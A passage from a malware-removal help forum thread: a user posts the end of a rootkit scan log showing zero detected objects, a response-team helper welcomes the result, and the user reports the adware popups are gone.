13:18:55.0093 0x020c  [ 3F5B5C05BA8002D171B482066CEDFE75, DDAC7B13387AC6729136315A30467FF6B3D94CF71CF91E7D53B70660028B0782 ] C:\WINDOWS\system32\igfxtray.exe
13:18:55.0140 0x020c  IgfxTray - ok
13:18:55.0156 0x020c  [ 71E7AC7708BDFF5FFA0FA33D38220195, F11CF440DFBC1573FA05959B3F727CE1AF721DC98333996BB777FC7CEB166FF9 ] C:\WINDOWS\system32\hkcmd.exe
13:18:55.0187 0x020c  HotKeysCmds - ok
13:18:55.0218 0x020c  [ 63678F54E6EFB60010C073E3979080E9, 7403D83F99F9F8F77BDF9FC925F48BCD407860BF11FED8872F9F9B42BB531B8C ] C:\WINDOWS\system32\igfxpers.exe
13:18:55.0265 0x020c  Persistence - ok
13:18:55.0343 0x020c  [ 72D78BD9AB1F457502F01832B07133CF, 28B63273420234F4349E23DCEDC5F80E9BAB307C08F39016E92DA7BCA411955E ] C:\Acer\Empowering Technology\eDataSecurity\eDSloader.exe
13:18:55.0406 0x020c  eDataSecurity Loader - detected UnsignedFile.Multi.Generic ( 1 )
13:18:55.0406 0x020c  Detect skipped due to KSN trusted
13:18:55.0406 0x020c  eDataSecurity Loader - ok
13:18:55.0453 0x020c  [ C67E00C1DCA52FB369DC54E9EE653D47, 5D6C19CFFCB221FEFA60870E1520DF035DD4433D0B5DEC505EBBC01D5EE6AD0D ] C:\Acer\Empowering Technology\eRecovery\eRAgent.exe
13:18:55.0500 0x020c  eRecoveryService - detected UnsignedFile.Multi.Generic ( 1 )
13:18:55.0500 0x020c  Detect skipped due to KSN trusted
13:18:55.0500 0x020c  eRecoveryService - ok
13:18:55.0562 0x020c  [ 2E73DF74A297EE6B91C4F57B9BD84317, 6B8BC16820071A7F54228792E075730E2E17043530CB62DCD2BCCC86D6011D29 ] C:\Program Files\Qwest\QuickCare\bin\sprtcmd.exe
13:19:00.0375 0x020c  ============================================================
13:19:00.0375 0x020c  Scan finished
13:19:00.0375 0x020c  ============================================================
13:19:00.0375 0x0ee8  Detected object count: 0
13:19:00.0375 0x0ee8  Actual detected object count: 0

 

 

 

RG
 



#14 Starbuck

  • Malware Response Team

Posted 23 September 2014 - 05:30 PM

Hi rockgremlin

13:19:00.0375 0x0ee8 Detected object count: 0
13:19:00.0375 0x0ee8 Actual detected object count: 0

That's good..... just what we wanted to see. :)

How's the system running now?



#15 rockgremlin


Posted 29 September 2014 - 06:05 PM

Everything's running quite well at present. I haven't seen a popup nor an unwelcome webpage or advertisement for weeks.

 

 

Many, many thanks.





